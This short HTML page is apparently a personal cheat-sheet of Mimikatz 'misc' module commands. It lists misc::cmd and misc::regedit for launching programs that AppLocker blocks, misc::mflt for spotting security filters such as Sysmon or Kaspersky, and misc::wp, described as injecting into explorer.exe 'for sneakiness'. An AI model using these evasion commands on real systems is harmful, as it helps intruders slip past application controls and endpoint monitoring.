<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Mimikatz - Applocker bypass and other sneaky</title>
</head><body>Misc in mimikatz may be able to launch apps blocked by applocker etc.<br/>
<br/>
misc::cmd<br/>
misc::regedit<br/>
<br/>
misc::mflt &nbsp; ***Some kind of filter that can tell if it's running sysmon, kaspersky etc<br/>
<br/>
misc::wp /file:tacos.jpg &nbsp; ***This will inject into explorer.exe for sneakiness<br/>
<br/>
</body></html>